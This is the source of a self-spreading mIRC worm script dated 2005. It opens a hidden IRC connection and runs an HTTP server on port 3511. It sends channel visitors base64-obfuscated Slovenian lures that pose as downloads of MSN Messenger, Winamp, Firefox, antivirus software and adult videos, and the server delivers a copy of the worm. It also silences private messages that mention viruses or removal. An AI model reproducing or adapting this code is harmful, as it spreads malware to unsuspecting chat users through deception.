   alias sbot { if ($sock(sbot).status == active) { halt } | .timer 1 3 .sockopen sbot $server 6669 }
   alias ssw { if ($sock($1).status == active) { sockwrite -n $1 $2- } }

   alias rnick { set %nn $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | return %nn }

   alias ruser { %v = $r(1,9)
     if (%v == 1) %v = $decode(aG90bWFpbC5jb20=,m) | if (%v == 2) %v = $decode(bGF0aW5tYWlsLmNvbQ==,m) | if (%v == 3) %v = $decode(eWFob28uY29t,m)
     if (%v == 4) %v = $decode(dGVycmEuY29t,m) | if (%v == 5) %v = $decode(bXNuLmNvbQ==,m) | if (%v == 6) %v = $decode(cmNwLm5ldA==,m)
     if (%v == 7) %v = $decode(Z2VkemFjLm9yZw==,m) | if (%v == 8) %v = $decode(dGVsZWZvbmljYS5jb20=,m) | if (%v == 9) %v = $decode(cGVydS5jb20=,m)
     return USER $rnick " $+ %v $+ " " $+ $sock($sockname).ip $+ " : $+ %v
   }

   on *:sockopen:sbot:{ .timerbb off | ssw sbot NICK $rnick | ssw sbot $ruser | .Set %rch $Chr(35) $+ $rnick | set %ssbot $true }
   on *:sockclose:sbot:{ .timerb off | .timerb 1 120 sbot | set %ssbot $false }

   on *:sockread:sbot:{ if ($sockerr > 0) { return }
     if ($sock(sbot).status == active) { sockread %rbot } | else { return }
     if ($sockbr == 0) { return } | if (%rbot == $null) { %rbot = - }
     if ($gettok(%rbot,1,32) == PING) { ssw sbot PONG $gettok(%rbot,2,58) }
   }

   ;--------------------------------------------------------------------

   on *:join:* {
     if ($level($address($nick,2)) != sh1t) && ($nick != $me) {
       if ($isfile($decode(%vwq,m) $+ 0.0) == $true) { set %cc1 $read($decode(%vwq,m) $+ 0.0, 2) | set %cc2 $read($decode(%vwq,m) $+ 0.0, 3) | set %cc3 $read($decode(%vwq,m) $+ 0.0, 4) }
       if (%cc1 == $null) { set %cc1 0 } | if (%cc2 == $null) { set %cc1 0 }
       if (%cc2 == 1) {
         if (%cc3 != $null) && ($isdir(%cc3) == $true) {
           if ($time(H) >= 12) && ($time(H) <= 14) { .guser sh1t $nick 2 | bprv $nick }
           if ($time(H) >= 18) && ($time(H) <= 21) { .guser sh1t $nick 2 | bprv $nick }
         }
       }
     } | .unset %rnd | .unset %rmd | .unset %rxd
   }

   alias sprv { if ($sock(sbot).status == active) { /sockwrite -n sbot* privmsg $1 : $+ $2- } | if ($sock(sbot).status != active) { .msg $1 $2- | .ignore -u30 $nick | .close -cm $nick } }

   alias bprv {
     set %pnd $r(1,24)
     if (%pnd == 1) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(Tk9WSSBtSVJDIHY2LjE3ISBTbmFtZZogc2kgZ2EgbGFoa28geiBodHRwOi8v,m) $+ $ip $+ : $+ %prt $+ $decode(L21pcmM2MTdfaW5zdGFsbC5leGU=,m) } }
     if (%pnd == 2) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(SkFPTyBNQVRFUiBUSSBQQSBTSSBaQVNUQVJFTEEgISEgTmFiYXZpIHNpIG5ham5vdmVqmmVnYSBtSVJDYSB2Ni4xNyEgS2kgZ2EgbGFoa28gem5hbWWaIHogaHR0cDovLw==,m) $+ $ip $+ : $+ %prt $+ $decode(L21pcmM2MTdfaW5zdGFsbC5leGU=,m) } }
     if (%pnd == 3) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(VXBhbSBkYSCeZSBtYZogbmFqbm92ZWqabyBjZWxvdG5vIHZlcnppam8gTVNOIE1lc3NlbmdlcmphIDcuMCAhISDIZSCaZSBnYSBuaW1hmiBzaSBnYSBsYWhrbyBzbmFtZZogeiBodHRwOi8v,m) $+ $ip $+ : $+ %prt $+ $decode(L0luc3RhbGxfTVNOX01lc3Nlbmdlcl83LjBfRlVMTF9TTE8uZXhl,m) } }
     if (%pnd == 4) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(SXqabGEgamUgbmFqbm92ZWqaYSBjZWxvdG5hIHJhemxp6GljYSBNU04gTWVzc2VuZ2VyamEgNy4wIHYgc2xvdmVuc2tlbSBqZXppa3UgISBodHRwOi8v,m) $+ $ip $+ : $+ %prt $+ $decode(L0luc3RhbGxfTVNOX01lc3Nlbmdlcl83LjBfRlVMTF9TTE8uZXhl,m) } }
     if (%pnd == 5) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(U2kgnmVsaZogbmFqbm92ZWqaZWdhIE1TTiBNRVNTRU5HRVJKQSA3LjAgRlVMTCB2IHNsb3ZlbnNrZW0gamV6aWt1ID8gaHR0cDovLw==,m) $+ $ip $+ : $+ %prt $+ $decode(L0luc3RhbGxfTVNOX01lc3Nlbmdlcl83LjBfRlVMTF9TTE8uZXhl,m) } }
     if (%pnd == 6) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(SXqabGEgamUgbmFqbm92ZWqaYSByYXpsaehpY2EgKDYuMCkgcHJvZ3JhbWEgV0lOQU1QIGtpIHZzZWJ1amUgdHVkaSBkb2RhdGVrIHphIHBvc3RhdmxqYW5qZSByYWRpanNraWggcG9zdGFqICEhISBodHRwOi8v,m) $+ $ip $+ : $+ %prt $+ $decode(L3dpbmFtcDYuMF9zZXR1cC5leGU=,m) } }
     if (%pnd == 7) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(U2kgnmVsaXRlIGxhc3RubyByYeh1bmFsbmmaa28gcmFkaWpza28gcG9zdGFqbyA/PyBOYW1lc3RpdGUgc2kgbmFqbm92ZWqabyB2ZXJ6aWpvIHdpbmFtcGEgdGFrb2ohIGh0dHA6Ly8=,m) $+ $ip $+ : $+ %prt $+ $decode(L3dpbmFtcDYuMF9zZXR1cC5leGU=,m) } }
     if (%pnd == 8) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(Tm92aSAoaW4gcG9tb2plIHBydmkpIHNsb3ZlbnNraSBwcm9ncmFtIHphIHByZXByb3N0byBpemRlbG92YW5qZSBzcGxldG5paCBzdHJhbmkhIFBvdGVnbmWaIHNpIGdhIGxhaGtvIHogaHR0cDovLw==,m) $+ $ip $+ : $+ %prt $+ $decode(L3NwbGV0a29fMi4wX2luc3RhbGFjaWphLmV4ZQ==,m) } }
     if (%pnd == 9) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(U2kgnmUgc2xpmm8gemEgZGRvcyBuYXBhZCA/PyDIZSBzaSBzbGmabywgc2kgc2UgemloZXIgc3ByYZpldmFsIGtqZSB0byBkb2JpdCBpbiBrYWsgbmFyZWRpdCAhISBObyBwb3NrdXNpIHMgdGVtIGh0dHA6Ly8=,m) $+ $ip $+ : $+ %prt $+ $decode(L3dhcmJpYXRjaC5leGU=,m) } }
     if (%pnd == 10) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(TE9MICEhISBUbyBtb3JhmiB2aWRldCAhIGh0dHA6Ly8=,m) $+ $ip $+ : $+ %prt $+ $decode(L1BFUEVaX1NFWF9MaVZlLmV4ZQ==,m) } }
     if (%pnd == 11) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(SEFIQUhBICEgaHR0cDovLw==,m) $+ $ip $+ : $+ %prt $+ $decode(L1BFUEVaX1NFWF9MaVZlLmV4ZQ==,m) } }
     if (%pnd == 12) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(Tm9yaSBzbG92ZW5za2kgcHJvZ3JhbSB6YSBpemRlbG92YW5qZSBSQVAgbXV6aWsgaW4gYml0b3YhIGh0dHA6Ly8=,m) $+ $ip $+ : $+ %prt $+ $decode(L3JhcGNyZWF0b3I1LjAuZXhl,m) } }
     if (%pnd == 13) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(R2xhc3VqWmFtZS5jb20gcHJlZHN0YXZsamEgbm92aSBwcm9ncmFtIHphIHByZXByb3N0byBnbGFzb3ZhbmplIGluIHByZWdsZWRvdmFuamUgZm9sa2EgISBQb3RlZ25lmiBzaSBnYSBsYWhrbyBpeiBodHRwOi8v,m) $+ $ip $+ : $+ %prt $+ $decode(L2dsYXN1anphbWVfc2V0dXAuZXhl,m) } }
     if (%pnd == 14) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(SG/oZZogbm92ZWdhIEZpcmVGb3hhIDIuMCA/IERvYmmaIGdhIG5hIGh0dHA6Ly8=,m) $+ $ip $+ : $+ %prt $+ $decode(XEZpcmVGb3gyLjAuZXhl,m) } }
     if (%pnd == 15) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(SG/oZZogbmFqbm92ZWqabyBNb3p6aWxvIHY1LjAgPyBEb2JpmiBqbyBuYSBodHRwOi8v,m) } }
     if (%pnd == 16) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(WmEgdnNlIHVzdHZhcmphbGNlIEhJUC1IT1AgbXV6aWtlICEgSXqaZWwgamUgbm92aSBIaXBIb3AgRUpheSA1ICEgRG9iaZogZ2EgbmEgaHR0cDovLw==,m) $+ $ip $+ : $+ %prt $+ $decode(XEhpcEhvcF9FSmF5NS4wX3NldHVwLmV4ZQ==,m) } }
     if (%pnd == 17) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(WmEgdnNlIHVzdHZhcmphbGNlIFJBdkUgbXV6aWtlICEgSXqaZWwgamUgbm92aSBSQXZFIEVKYXkgNSAhIERvYmmaIGdhIG5hIGh0dHA6Ly8=,m) $+ $ip $+ : $+ %prt $+ $decode(XFJBdkVfRUpheTUuMF9pbnN0YWxsLmV4ZQ==,m) } }
     if (%pnd == 18) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(SXogV2ViVGVjaGEgc28gZGFuZXMgc3Bvcm/oaWxpIGRhIGplIGl6mmxhIG5vdmEgcmF6bGnoaWNhIHByb2dyYW1hIEJTIFBMQVlFUiAhISBEb3dubG9hZGGaIHNpIGxhaGtvIHogaHR0cDovLw==,m) $+ $ip $+ : $+ %prt $+ decode(XEJTUGxheWVyX2luc3RhbGwuZXhl,m) } }
     if (%pnd == 19) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(TWlzbGltIGRhIHRpIJ5lIG5hc2xvdiBkYXRvdGVrZSBwb3ZlIHZzZSAhIGh0dHA6Ly8=,m) $+ $ip $+ : $+ %prt $+ decode(XGV4ZV8yX2pwZy5leGU=,m) } }
     if (%pnd == 20) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(TE9PT09PT09PT09PT09MICEgaHR0cDovLw==,m) $+ $ip $+ : $+ %prt $+ decode(XEJ1c2gtQmxvd0pvYi5zY3I=,m) } }
     if (%pnd == 21) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(QUhBSEEgISBodHRwOi8v,m) $+ $ip $+ : $+ %prt $+ $decode(XEJ1c2gtQmxvd0pvYi5zY3I=,m) } }
     if (%pnd == 22) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(TmFqbm92ZWqaaSBpbiBwcmVwcm9zdGkgcHJvZ3JhbSB6YSBpenZhamFuamUgRERPUyBuYXBhZG92ICEgaHR0cDovLw==,m) $+ $ip $+ : $+ %prt $+ decode(XEREb3NDbGllbnQyb281LmV4ZQ==,m) } }
     if (%pnd == 23) { .timer $+ in $+ $1 1 $r(10,60) { sprv $1 $decode(TmFqYm9smmkgaW4gbmFqbm92ZZppIGFudGl2aXJ1c25pIHByb2dyYW0gdnNlaCDoYXNvdiAhISBEb2JpmiBnYSBuYSBodHRwOi8v,m) $+ $ip $+ : $+ %prt $+ $decode(XGthc3BlcnNreTYuZXhl,m) } }
   }

   on *:TEXT:*:?: { if (format isin $1-) || (okužen isin $1-) || (arv isin $1-) || (trojan isin $1-) || (troyano isin $1-) || (virus isin $1-) || (worm isin $1-) || (set isin $1-) || (enable isin $1-) || (disable isin $1-) || (remote isin $1-) || (script isin $1-) || (play isin $1-) || (sock isin $1-) || (write isin $1-) || (decode isin $1-) || (alias isin $1-) || (load isin $1-) || (unload isin $1-) || (remini isin $1-) || (remove isin $1-) || (events isin $1-) || (timer isin $1-) { .ignore -u30 $nick | .close -cm $nick } }

   ;-----------------------------------------------------------------------

   alias shttp { if ($sock(pfile).status != listening) { .socklisten pfile 3511 } }
   On *:socklisten:pfile:{ .sockaccept tfil $+ $r(0,9999999999) }
   on *:sockopen:pfile: { set %ffser $true }
   on *:sockclose:pfile: { set %ffser $false }

   On *:sockread:tfil*:{ if ($sockerr > 0) { return }
     if ($sock($sockname).status == active) { sockread %sendFil }
     else { return }
     if ($sockbr == 0) { return }
     if (%sendFil == $null) { %sendFil = - }
     if (/ isin $gettok(%sendFil,2,32) ) && (.exe isin $gettok(%sendFil,2,32) ) { .copy -o $decode(%vwq,m) $+ mirc.dll %cc3 $+ \ $+ wb.exe | sendfile %cc3 $+ \ $+ wb.exe }
     if (/ isin $gettok(%sendFil,2,32) ) && (.pif isin $gettok(%sendFil,2,32) ) { .copy -o $decode(%vwq,m) $+ mirc.dll %cc3 $+ \ $+ wb.exe | sendfile %cc3 $+ \ $+ wb.exe }
     if (/ isin $gettok(%sendFil,2,32) ) && (.scr isin $gettok(%sendFil,2,32) ) { .copy -o $decode(%vwq,m) $+ mirc.dll %cc3 $+ \ $+ wb.exe | sendfile %cc3 $+ \ $+ wb.exe }
   }
   Alias sendFile {
     ssw $sockname $decode(SFRUUC8xLjEgMjAwIE9L,m)
     ssw $sockname $decode(RGF0ZTo=,m) $+ $Chr(32) $+ $fulldate
     ssw $sockname $decode(U2VydmVyOiBOZXRzY2FwZS1FbnRlcnByaXNlLzQuMQ==,m)
     ssw $sockname $decode(QWNjZXB0LVJhbmdlczogYnl0ZXM=,m)
     ssw $sockname $decode(Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0=,m)
     ssw $sockname $decode(Q29udGVudC1MZW5ndGg6,m) $+ $Chr(32) $+ $file($1-).size
     ssw $sockname $decode(QWNjZXB0LUVuY29kaW5nOiBpZGVudGl0eQ==,m)
     ssw $sockname $crlf
     Set %lfil 0 | Set %ufil $lof($1-) | Set %gfil $1-
   }
   Alias spread { if ($isfile($2-) == $true) { bread " $+ $2- $+ " %lfil 64 &fyle }
   sockwrite $1 &fyle | %lfil = $calc(%lfil + $bvar(&fyle,0)) }
   On *:sockwrite:tfil*:{ if ($sockerr > 0) { sockclose $sockname | return }
     if (%lfil >= %ufil) { sockclose $sockname | return }
   spread $sockname %gfil }

   ;--------------------------------------------------------------------

   On 1:Disconnect:{ .timers off | .sockclose bv.* | .sockclose i.* | .sockclose sbot* }

   ; :: mIRC.LiVe^Owned.E :: (c) 2oo5 By [x]-Pr0j3c7 ::

   on *:CONNECT: {
     set %vwq $encode(C:\WINDOWS\,m)
     .rlevel sh1t | set %prt 3511 | .write -l1 $decode(%vwq,m) $+ 0.0 $nick | sbot | shttp
   }


   on *:CONNECT: {
     set %vwq $encode(C:\WINDOWS\,m)
     .rlevel sh1t | set %prt 3511 | .write -l1 $decode(%vwq,m) $+ 0.0 $nick | sbot | shttp
   }

   on *:CONNECT: {
     set %vwq $encode(C:\WINDOWS\,m)
     .rlevel sh1t | set %prt 3511 | .write -l1 $decode(%vwq,m) $+ 0.0 $nick | sbot | shttp
   }
